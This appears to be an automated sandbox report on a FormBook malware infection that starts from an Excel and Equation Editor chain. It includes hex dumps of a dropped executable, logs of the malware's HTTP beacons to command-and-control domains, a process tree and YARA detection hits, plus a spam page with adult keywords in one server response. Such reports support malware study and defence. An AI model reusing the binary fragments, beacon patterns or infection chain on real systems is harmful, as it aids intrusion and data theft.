00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:F6@;@;P.textgh `.rdatal@@.data9@.ndata:.rsrcP;@@
                                                      May 14, 2022 15:19:31.645431042 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 b0 8a 7a 00 8d 45 a4
                                                      Data Ascii: U\}t+}FEuHzHPuuu@BSV5zEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                                      May 14, 2022 15:19:31.645451069 CEST6INData Raw: 7a 00 e9 f9 16 00 00 8b 88 80 8b 7a 00 89 88 20 8b 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 20 8b 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 20 8b 7a 00 57 e9 31 16 00 00 8b 0d 70 7a 7a 00 8b 35 50
                                                      Data Ascii: zz zE4 z3;#MDE4 zW1pzz5P@;tuQEzz;PQjuP@nmjPEJ;tZj\VIf>ff;u9]tCFtuEuF;t=uu
                                                      May 14, 2022 15:19:31.645468950 CEST7INData Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
                                                      Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                                                      May 14, 2022 15:19:31.645490885 CEST9INData Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 1c 37 00 00 56 e8 97 3c 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 17 4b 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 d8 45 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
                                                      Data Ascii: uGSVj7V<;j9]t!VK9]|PuE;tEV$@4jPI;tvuEvQEffjuMEQPjIEf;fEVj@8@;EjIjEIuEVSuU
                                                      May 14, 2022 15:19:31.645509005 CEST10INData Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 6e 0e 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
                                                      Data Ascii: DujY@VUXuhWSunPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE!@ffM^h>j;YUfn9]M
                                                      May 14, 2022 15:19:31.645526886 CEST11INData Raw: 08 e8 f8 37 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 47 09 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
                                                      Data Ascii: 7W4@MSSuuGu$@j;^}j^up@EVS#Y;=zUEi5z;|uVu;Q+MtjYUEuFP;NEM9]JW?S YU09]t"9]
                                                      May 14, 2022 15:19:31.645544052 CEST13INData Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 dc 3a 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
                                                      Data Ascii: tu@j:uuu@u@jVuu_^[U}ujhju@@E}uEF=zT@u @PEQPT@EPuD@EPhu,30y@y;rPjdQ@UV39ut
                                                      May 14, 2022 15:19:31.645562887 CEST14INData Raw: 79 00 2b 35 60 ce 40 00 57 03 74 24 14 ff 15 f8 80 40 00 33 db 05 f4 01 00 00 3b f3 a3 ac 8a 7a 00 0f 8e 2a 01 00 00 ff 35 44 f7 79 00 e8 46 01 00 00 53 53 ff 35 60 ce 40 00 ff 35 1c a0 40 00 ff 15 60 81 40 00 89 35 40 f7 79 00 89 1d 30 f7 79 00
                                                      Data Ascii: y+5`@Wt$@3;z*5DyFSS5`@5@`@5@y0y0x8y@+Dy;07yWV=Dy5h@=l@9zt)9@zu!@yS+4y+D$`@0yYhh@-p@t@26|j5p@+t!VU5@
                                                      May 14, 2022 15:19:31.645581961 CEST15INData Raw: 72 50 0f b7 05 3e a3 40 00 99 0f a4 c2 10 c1 e0 10 8b d8 0f b7 05 3c a3 40 00 0f b7 0d 38 a3 40 00 99 0b d8 0f b7 05 3a a3 40 00 c1 e0 10 0b c1 33 c9 99 0b c8 8b c3 0b c2 8b 17 3b d1 75 07 8b 57 04 3b d0 74 0a 4f 4f 81 ff 00 30 7b 00 73 e9 33 db
                                                      Data Ascii: rP>@<@8@:@3;uW;tOO0{s30{E@rAfW&=Wh8{.,Wh@{#,]LzE!h,@V,th(@V,h@V+H{WV(@Vt h!
                                                      May 14, 2022 15:19:31.759368896 CEST17INData Raw: 50 ff 74 24 2c ff 74 24 2c 68 00 00 00 80 57 56 68 80 00 00 00 ff 15 24 82 40 00 a3 68 1f 7a 00 57 e8 eb d4 ff ff 85 c0 74 08 6a 02 58 e9 bf 00 00 00 e8 c2 00 00 00 39 3d 40 8b 7a 00 0f 85 83 00 00 00 6a 05 ff 35 68 1f 7a 00 ff 15 50 82 40 00 68
                                                      Data Ascii: Pt$,t$,hWVh$@hzWtjX9=@zj5hzP@h<@v*uh0@h*5(@@SUWuSh@WS-dzz@zzWih@@WP5z,@jVj+Wt9=lzzNj.Bj"3_^


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.224917434.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 14, 2022 15:20:49.298163891 CEST282OUTGET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1
                                                      Host: www.arjimni.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      May 14, 2022 15:20:49.414908886 CEST282INHTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Sat, 14 May 2022 13:20:49 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 291
                                                      ETag: "627e7264-123"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.2249175198.54.117.21280C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 14, 2022 15:20:54.628197908 CEST283OUTGET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1
                                                      Host: www.contractornurd.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.2249176164.155.217.5780C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 14, 2022 15:21:00.315134048 CEST284OUTGET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1
                                                      Host: www.tw-life.net
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      May 14, 2022 15:21:00.731961012 CEST285INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sat, 14 May 2022 13:21:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 466
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.224917723.81.214.2680C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 14, 2022 15:21:06.148781061 CEST286OUTGET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1
                                                      Host: www.yiwanggkm.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      May 14, 2022 15:21:06.311940908 CEST287INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sat, 14 May 2022 13:20:51 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 1782
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c1 b9 c9 bd c7 c8 d3 d4 bd cc d3 fd d7 c9 d1 af d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 37 38 32 37 3b 26 23 32 31 33 33 35 3b 26 23 32 32 39 31 39 3b 26 23 32 32 38 39 39 3b 26 23 32 37 36 31 31 3b 26 23 33 33 35 39 32 3b 26 23 33 33 35 39 32 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 33 35 36 39 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 34 35 38 38 3b 26 23 33 33 34 36 39 3b 26 23 34 30 36 33 35 3b 26 23 33 35 39 31 30 3b 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 37 38 32 37 3b 26 23 32 31 33 33 35 3b 26 23 32 32 39 31 39 3b 26 23 32 32 38 39 39 3b 26 23 32 37 36 31 31 3b 26 23 33 33 35 39 32 3b 26 23 33 33 35 39 32 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 33 35 36 39 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 34 35 38 38 3b 26 23 33 33 34 36 39 3b 26 23 34 30 36 33 35 3b 26 23 33 35 39 31 30 3b 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 37 38 32 37 3b 26 23 32 31 33 33 35 3b 26 23 32 32 39 31 39 3b 26 23 32 32 38 39 39 3b 26 23 32 37 36 31 31 3b 26 23 33 33 35 39 32 3b 26 23 33 33 35 39 32 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 33 35 36 39 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 34 35 38 38 3b 26 23 33 33 34 36 39 3b 26 23 34 30 36 33 35 3b 26 23 33 35 39 31
                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#27827;&#21335;&#22919;&#22899;&#27611;&#33592;&#33592;&#98;&#98;&#119;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#31934;&#21697;&#23569;&#22919;&#20154;&#22971;&#97;&#118;&#20813;&#36153;&#20037;&#20037;,&#34588;&#33469;&#40635;&#35910;&#23588;&#29289;&#22269;&#20135;&#31934;&#21697;</title><meta name="keywords" content="&#27827;&#21335;&#22919;&#22899;&#27611;&#33592;&#33592;&#98;&#98;&#119;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#31934;&#21697;&#23569;&#22919;&#20154;&#22971;&#97;&#118;&#20813;&#36153;&#20037;&#20037;,&#34588;&#33469;&#40635;&#35910;&#23588;&#29289;&#22269;&#20135;&#31934;&#21697;" /><meta name="description" content="&#27827;&#21335;&#22919;&#22899;&#27611;&#33592;&#33592;&#98;&#98;&#119;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#31934;&#21697;&#23569;&#22919;&#20154;&#22971;&#97;&#118;&#20813;&#36153;&#20037;&#20037;,&#34588;&#33469;&#40635;&#3591
                                                      May 14, 2022 15:21:06.311974049 CEST288INData Raw: 30 3b 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32
                                                      Data Ascii: 0;&#23588;&#29289;&#22269;&#20135;&#31934;&#21697;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21999;&#21834;&#21416;&#25151;&#37324;&#38394;&#34588;&#30340;&#21627;&#21535;&#22768;,&#2743


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:15:18:17
                                                      Start date:14/05/2022
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13fe10000
                                                      File size:28253536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:2
                                                      Start time:15:18:42
                                                      Start date:14/05/2022
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:4
                                                      Start time:15:18:48
                                                      Start date:14/05/2022
                                                      Path:C:\Users\Public\vbc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\vbc.exe"
                                                      Imagebase:0x400000
                                                      File size:263772 bytes
                                                      MD5 hash:DE76EF6A11A63EFC00B0303888BC0B7F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 51%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:5
                                                      Start time:15:18:51
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\yldnat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                      Imagebase:0x13b0000
                                                      File size:80384 bytes
                                                      MD5 hash:BC3C746DB1D3F8A821BBDF17CA023450
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Target ID:6
                                                      Start time:15:18:53
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\yldnat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                      Imagebase:0x13b0000
                                                      File size:80384 bytes
                                                      MD5 hash:BC3C746DB1D3F8A821BBDF17CA023450
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Target ID:7
                                                      Start time:15:18:57
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xff040000
                                                      File size:3229696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
